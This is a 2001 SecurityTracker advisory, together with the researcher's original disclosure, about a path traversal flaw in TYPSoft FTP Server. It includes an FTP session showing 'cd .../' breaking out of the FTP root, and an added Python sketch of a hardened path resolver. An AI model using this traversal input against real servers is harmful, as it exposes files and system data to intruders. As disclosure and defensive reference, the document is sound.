SecurityTracker.com
Category:   Application (File Transfer/Sharing)  >   FTP (Generic)
Vendors:   TYPSoft
TYPSoft FTP Server Lets Remote Users Obtain Files From Outside of the FTP Server's Document Directory
SecurityTracker Alert ID:  1001518
SecurityTracker URL:  http://securitytracker.com/id/1001518
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  May 11 2001
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): v0.93 - v0.95; possibly earlier versions
Description:   TYPSoft's FTP server reportedly contains a vulnerability that allows a remote user to obtain files from the server located outside of the FTP server's root document directory.

A remote user can use "..." characters to trigger the vulnerability and break out of the FTP root document directory.

A transcript of a vulnerable session follows:

>ftp 127.0.0.1
220 TYPsoft FTP server 0.95 ready...
User (127.0.0.1:(none)): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp>pwd
257 " / " is current directory.
ftp>cd ../
501 CWD failed. Cannot accept relative path using dot notation.
ftp> cd .../
250 CWD command successful. "/.../" is current directory.
ftp>dir
drw-rw-rw- 1 ftp ftp 0 May 01 19:44 FTP Server
drw-rw-rw- 1 ftp ftp 0 May 01 19:47 temp
drw-rw-rw- 1 ftp ftp 0 Dec 24 2000 windows
.....
226 Transfer complete.
ftp>

The vendor was reportedly contacted.
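
Added example (not part of the advisory and not TYPSoft's code): the transcript shows "../" being refused while ".../" is accepted, so the sketch below places a filter of that assumed shape beside a hardened CWD resolver that refuses dot-only components and then verifies the canonical path is still inside the FTP root. The function names and sample arguments are constructed for illustration.

```python
import os
import posixpath

def naive_filter(arg):
    """Assumed shape of the flawed check: only a literal '..' component is refused."""
    return ".." not in arg.replace("\\", "/").split("/")

def resolve_cwd(root, cwd, arg):
    """Map `CWD arg` (issued from virtual dir `cwd`) to a real path under `root`.

    Raises PermissionError if the argument could leave the FTP root.
    """
    virtual = posixpath.join(cwd, arg.replace("\\", "/"))  # absolute arg replaces cwd
    parts = []
    for comp in virtual.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if parts:
                parts.pop()          # never climbs above the virtual root
            continue
        # The transcript shows "..." escaping the root, so refuse any component
        # made up only of dots and spaces instead of passing it to the OS.
        if set(comp) <= set(". "):
            raise PermissionError("dot-only path component: %r" % comp)
        parts.append(comp)
    real_root = os.path.realpath(root)
    real = os.path.realpath(os.path.join(real_root, *parts))
    # Final containment check on the canonical path (also catches links).
    if os.path.commonpath([real_root, real]) != real_root:
        raise PermissionError("path resolves outside the FTP root")
    return real

if __name__ == "__main__":
    import tempfile
    root = tempfile.mkdtemp()                   # constructed sample FTP root
    for arg in ("../", ".../", "....\\", "."):  # constructed CWD arguments
        try:
            result = resolve_cwd(root, "/", arg)
        except PermissionError as exc:
            result = "refused (%s)" % exc
        print("%-8r naive_filter=%s hardened=%s" % (arg, naive_filter(arg), result))
```
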

Impact:   A remote user with access to the server can obtain files from the server located outside of the FTP server's root document directory.
Solution:   No solution was available at the time of this entry.
Vendor URL:  typsoft.n3.net
Cause:   Access control error
Underlying OS:  Windows (Me), Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:   None.


 Source Message Contents

Subject:  Vulnerability in TYPsoft FTP server


~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability in TYPsoft FTP server v0.95
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:
TYPsoft FTP Server is a freeware FTP server available from
http://typsoft.n3.net .

Affected systems:
FTP server v0.95 - 0.93 and probably prior versions for
Windows 95/98/NT/2000/ME

Description:
An attacker with anonymous access to the ftp server can break out of the ftp
root using the dot vulnerability.
This is the problem:

>ftp 127.0.0.1
220 TYPsoft  FTP server 0.95 ready...
User (127.0.0.1:(none)): anonymous
331  Password required for anonymous.
Password:
230 User anonymous logged in.
ftp>pwd
257  " / "  is current directory.
ftp>cd ../
501 CWD failed. Cannot  accept relative path using dot  notation.
ftp> cd .../
250 CWD command successful. "/.../" is current directory.
ftp>dir
drw-rw-rw-             1 ftp           ftp                 0 May   01 19:44 FTP Server
drw-rw-rw-             1 ftp           ftp                 0 May   01 19:47 temp
drw-rw-rw-             1 ftp           ftp                 0 Dec    24 2000 windows
.....
226 Transfer complete.
ftp>

Vendor status:
TYPsoft staff was contacted on Tuesday 1 May, 2001 and no reply was received.

SosPiro
sospiro@freemail.it

 
 



Copyright 2019, SecurityGlobal.net LLC